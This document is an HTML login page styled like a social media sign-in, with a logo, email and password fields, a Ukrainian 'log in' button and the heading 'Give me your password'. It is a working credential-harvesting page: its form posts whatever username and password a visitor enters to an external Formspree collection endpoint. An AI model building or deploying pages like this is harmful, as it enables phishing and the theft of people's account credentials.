<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>F3</title>
  <link rel="icon" href="%D0%91%D0%B5%D0%B7%20%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F.jpg">
    <style>
        *{
            margin:0;
            padding: 0;
            box-sizing: border-box;
        }
        body{
            background: rgb(131,58,180);
background: linear-gradient(90deg, rgba(131,58,180,1) 0%, rgba(253,29,29,1) 50%, rgba(252,176,69,1) 100%);
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            
        }
        form{
             display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            
        }
        input{
            width: 300px;
            height: 40px;
            padding: 10px;
            border-radius: 5px;
            border: none;
            color: #333;
            font-size: 20px;
            outline: none;
            box-shadow: 0 0 2px #333;
            margin: 10px;
        }
        button{
            width: 100px;
            height: 40px;
            background-color: dodgerblue;
            color: white;
            font-weight: 900;
            border: none;
            border-radius: 5px;
            margin-top: 10px;
            cursor: pointer;
            position: relative;
            
        }
        button:active{
            top: 3px;
        }
        button:hover{
            background-color: #087cb9;
        }
        .logo{
            
            width: 100px;
            height: 100px;
            background-image: url(%D0%91%D0%B5%D0%B7%20%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F.jpg);
                border-radius: 20px;
            box-shadow: 0 3px 3px #333;
            position: fixed;
            top: 50px;
            background-size: cover;
        }
    </style>
</head>
<body>
   <div class="logo"></div>
    <form
  action="https://formspree.io/f/mvodrnaz"
  method="POST"
><h1>Give me your password</h1>

    <input placeholder="Username" type="email" name="_replyto">

    <input placeholder="Password" type="password" name="message">



  <button type="submit">Увійти</button>
</form>
</body>
</html>